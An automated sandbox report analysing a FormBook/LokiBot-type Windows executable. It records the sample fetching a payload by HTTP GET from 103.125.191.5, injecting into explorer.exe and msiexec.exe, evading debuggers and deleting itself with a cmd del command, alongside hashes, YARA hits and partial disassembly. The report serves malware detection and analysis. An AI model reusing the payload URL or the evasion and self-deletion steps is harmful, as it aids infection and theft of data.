                        Start date: 19.11.2020
                        Start time: 10:47:26
                        Joe Sandbox Product: CloudBasic
                        Overall analysis duration: 0h 8m 39s
                        Hypervisor based Inspection enabled: false
                        Report type: full
                        Sample file name: 2eD17GZuWs.exe
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed: 15
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Detection: MAL
                        Classification: mal100.rans.troj.spyw.evad.winEXE@8/0@0/1
                        EGA Information: Failed
                        HDC Information:
                        • Successful, ratio: 52% (good quality ratio 42.1%)
                        • Quality average: 65.4%
                        • Quality standard deviation: 37.1%
                        HCA Information:
                        • Successful, ratio: 69%
                        • Number of executed functions: 246
                        • Number of non-executed functions: 17
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        Match | Associated Sample Name / URL | Detection | Context
                        103.125.191.5 | Unique food order.xlsx | malicious | 103.125.191.5/bin_xMjelaYnr43.bin

                        Domains

                        No context

                        ASN

                        Match | Associated Sample Name / URL | Detection | Context
                        VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Unique food order.xlsx | malicious | 103.125.191.5
                         | tt payment proof.xlsx | malicious | 103.125.191.187
                         | TIE-3735-2020.xlsx | malicious | 103.125.191.229
                         | payslip.s.xlsx | malicious | 103.125.191.187
                         | Telex-relase.xlsx | malicious | 103.141.138.120
                         | Y0L60XAhvo.rtf | malicious | 103.141.138.122
                         | d6pj421rXA.exe | malicious | 103.139.45.59
                         | 8YPssSkVtu.rtf | malicious | 103.141.138.87
                         | PI098763556299.xlsx | malicious | 103.125.191.229
                         | PIT12425009.xlsx | malicious | 103.125.191.229
                         | wIeFid8p7Q.exe | malicious | 103.125.189.164
                         | Dell ordine-09362-9-11-2020.exe | malicious | 103.139.45.59
                         | shipping documents.xlsx | malicious | 103.133.108.6
                         | shipping documents.xlsx | malicious | 103.133.108.6
                         | EES RFQ 60-19__pdf.exe | malicious | 103.114.107.156
                         | Quotation_20CF18909.xlsx | malicious | 103.141.138.122
                         | Quotation_20CF18909.xlsx | malicious | 103.141.138.122
                         | Z08LsyTAN6.exe | malicious | 103.125.189.164
                         | QUO_M.VECOQUEEN.xlsx.docx | malicious | 103.125.191.123
                         | R56D5hnFR3.rtf | malicious | 103.125.191.123

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type: PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit): 4.914988096771549
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.15%
                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name: 2eD17GZuWs.exe
                        File size: 61440
                        MD5: c05eee88f0b57e853996957d6523397b
                        SHA1: fc16fa4ab9a88f7e2405eb9a77d168d9c1b7c8d3
                        SHA256: 7e70e44956cdb045fd7b5c66eca50996900059fd8851aa76be19a5dd492c6918
                        SHA512: 9441441f5d6d84e4c674e77013ce1bf562173195de9ac1c05463bcf0bbda51345b6af219b279f93e7d2df84bbfb22d11906b8a145f1fe98efaf3a28786be220f
                        SSDEEP: 768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                        File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......P.....................0....................@........

                        File Icon

                        Icon Hash: 20047c7c70f0e004

                        Static PE Info

                        General

                        Entrypoint: 0x401218
                        Entrypoint Section: .text
                        Digitally signed: false
                        Imagebase: 0x400000
                        Subsystem: windows gui
                        Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        DLL Characteristics:
                        Time Stamp: 0x50B8A68A [Fri Nov 30 12:28:58 2012 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major: 4
                        OS Version Minor: 0
                        File Version Major: 4
                        File Version Minor: 0
                        Subsystem Version Major: 4
                        Subsystem Version Minor: 0
                        Import Hash: 823b3db4fa697cef327445c59300049d

                        Entrypoint Preview

                        Instruction
                        push 004019DCh
                        call 00007FA87CA2F933h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        inc eax
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [edi], al
                        or al, C7h
                        stosd
                        pushfd
                        add bl, ah
                        inc esi
                        xchg eax, edi
                        sbb eax, A17D13C7h
                        popad
                        in eax, 00h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al
                        popad
                        je 0000F9B5h
                        jns 00007FA87CA2F9ADh
                        imul esp, dword ptr [ebp+74h], 73h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        dec esp
                        xor dword ptr [eax], eax
                        pop ds
                        mov ebp, AFADF0F4h
                        xchg eax, ebx
                        or byte ptr [ebp-54h], FFFFFFEDh
                        sub al, B9h
                        mov word ptr [edx+3BA912D4h], cs
                        cmc

                        Data Directories

                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc304 | 0x3c | .text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x8f8 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x230 | 0x30 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xac | .text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                        Sections

                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0xb660 | 0xc000 | False | 0.449890136719 | data | 5.65312994467 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .data | 0xd000 | 0x13bc | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc | 0xf000 | 0x8f8 | 0x1000 | False | 0.16943359375 | data | 1.94217064888 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        Name | RVA | Size | Type | Language | Country
                        RT_ICON | 0xf7c8 | 0x130 | data | |
                        RT_ICON | 0xf4e0 | 0x2e8 | data | |
                        RT_ICON | 0xf3b8 | 0x128 | GLS_BINARY_LSB_FIRST | |
                        RT_GROUP_ICON | 0xf388 | 0x30 | data | |
                        RT_VERSION | 0xf150 | 0x238 | data | English | United States

                        Imports

                        DLL | Import
                        USER32.DLL | HideCaret
                        MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                        Version Infos

                        Description | Data
                        Translation | 0x0409 0x04b0
                        InternalName | LUKENES
                        FileVersion | 1.00
                        CompanyName | Dynegy
                        Comments | Dynegy
                        ProductName | aftrykkets
                        ProductVersion | 1.00
                        OriginalFilename | LUKENES.exe

                        Possible Origin

                        Language of compilation system | Country where language is spoken
                        English | United States

                        Network Behavior

                        Snort IDS Alerts

                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        11/19/20-10:49:58.574580 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49756 | 80 | 192.168.2.4 | 103.125.191.5

                        Network Port Distribution

                        TCP Packets

                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 19, 2020 10:50:02.474522114 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474528074 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474549055 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474551916 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474565983 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474580050 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474617958 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474622965 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474639893 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474657059 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474664927 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474674940 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474704027 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474720955 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474750042 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474750042 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474786997 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474808931 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474811077 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474877119 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474878073 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474894047 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474911928 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474930048 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474941015 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474950075 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.474957943 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.474988937 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475023031 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475023985 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475043058 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475073099 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475095987 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475204945 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475222111 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475239038 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475270033 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475276947 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475317955 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475368977 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475389004 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475408077 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475419044 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475433111 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475462914 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475466013 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475483894 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475497961 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475534916 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475594997 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475632906 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475641012 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475675106 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475677967 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475712061 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475717068 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475753069 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475754023 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475797892 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475811005 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475857019 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475888014 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475903988 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475920916 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475934029 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475938082 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475959063 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.475965977 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.475976944 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.476008892 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.476051092 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.476068020 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.476111889 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799149990 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799181938 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799195051 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799207926 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799220085 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799236059 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799249887 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799263000 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799295902 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799319029 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799336910 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799355030 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799377918 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799505949 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799540043 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799552917 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799570084 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799582005 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799597025 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799612045 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799628973 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799649954 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799669027 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799685955 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799702883 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799721003 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799740076 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799750090 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:02.799875021 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799895048 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799897909 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799901009 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:02.799904108 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:04.413501978 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:04.413624048 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:28.786468983 CET4975680192.168.2.4103.125.191.5

                        HTTP Request Dependency Graph

                        • 103.125.191.5

                        HTTP Packets

                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        0 | 192.168.2.4 | 49756 | 103.125.191.5 | 80 | C:\Users\user\Desktop\2eD17GZuWs.exe

                        Timestamp | kBytes transferred | Direction | Data
                        Nov 19, 2020 10:49:58.574579954 CET | 5396 | OUT | GET /bin_xMjelaYnr43.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Host: 103.125.191.5
                        Cache-Control: no-cache
                        Nov 19, 2020 10:49:58.891490936 CET | 5397 | IN | HTTP/1.1 200 OK
                        Date: Thu, 19 Nov 2020 09:49:57 GMT
                        Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                        Last-Modified: Wed, 18 Nov 2020 21:20:27 GMT
                        ETag: "2d640-5b4682e21b662"
                        Accept-Ranges: bytes
                        Content-Length: 185920
                        Content-Type: application/octet-stream



                        System Behavior

                        General

                        Start time:10:48:23
                        Start date:19/11/2020
                        Path:C:\Users\user\Desktop\2eD17GZuWs.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x400000
                        File size:61440 bytes
                        MD5 hash:C05EEE88F0B57E853996957D6523397B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Visual Basic
                        Reputation:low

                        General

                        Start time:10:48:34
                        Start date:19/11/2020
                        Path:C:\Users\user\Desktop\2eD17GZuWs.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x400000
                        File size:61440 bytes
                        MD5 hash:C05EEE88F0B57E853996957D6523397B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Start time:10:50:04
                        Start date:19/11/2020
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:
                        Imagebase:0x7ff6fee60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:10:50:22
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\autofmt.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                        Imagebase:0x1150000
                        File size:831488 bytes
                        MD5 hash:7FC345F685C2A58283872D851316ACC4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:10:50:22
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\msiexec.exe
                        Imagebase:0x1240000
                        File size:59904 bytes
                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, Author: Florian Roth
                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Start time:10:50:26
                        Start date:19/11/2020
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
                        Imagebase:0x11d0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:10:50:27
                        Start date:19/11/2020
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        Code Analysis


                          Executed Functions

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: W.E$1.!T$ntdll
                          • API String ID: 1029625771-2038033260
                          • Opcode ID: df1d7e25fe2405ffd91c6f2229c7137afdf75735c254c4b97c50faf073f8e9f5
                          • Instruction ID: da6c13bd5bdf25b3afe99597867547dd07f21777d6c1d61eb1295c7637d27d36
                          • Opcode Fuzzy Hash: df1d7e25fe2405ffd91c6f2229c7137afdf75735c254c4b97c50faf073f8e9f5
                          • Instruction Fuzzy Hash: F9028C347C0305FEEF346E648CA47EA23679F4A394FD5012AEC9A97185D77988C6CA12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                            • Part of subcall function 021D5A6C: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021D5609,00000040,021D0570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 021D5A87
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                          • String ID: 1.!T
                          • API String ID: 449006233-3147410236
                          • Opcode ID: 0dfa85546250b16a6c5da4e598c3570d59c47ef42f48d5360ab09f9800666a5b
                          • Instruction ID: 3f5ea58cb1dd9bff4e398ad37589425be4b76c7b3ed3c32903b690e3d5b5694f
                          • Opcode Fuzzy Hash: 0dfa85546250b16a6c5da4e598c3570d59c47ef42f48d5360ab09f9800666a5b
                          • Instruction Fuzzy Hash: 75328B706C0342EEEF249E24CDD4BEA77A3EF16360F958269EDA18B2C5D3758485C712
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: 7HoB$DV
                          • API String ID: 1029625771-80660350
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID: 1.!T
                          • API String ID: 4046476035-3147410236
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • EnumWindows.USER32(021D04A1,?,00000000,00000000,00000040,00000000,?), ref: 021D0481
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: EnumInformationThreadWindows
                          • String ID: 1.!T
                          • API String ID: 1954852945-3147410236
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edx, signed int __edi, void* __esi) {
                          				signed char _t253;
                          				signed char _t254;
                          				signed char _t256;
                          				signed int _t257;
                          				void* _t258;
                          				signed int _t261;
                          				signed char _t262;
                          				signed int _t265;
                          				signed int _t266;
                          				signed char _t268;
                          				signed int _t269;
                          				intOrPtr* _t270;
                          				signed char _t271;
                          				signed char _t272;
                          				void* _t274;
                          				signed char _t277;
                          				signed char _t278;
                          				signed char _t279;
                          				signed char _t280;
                          				signed char _t282;
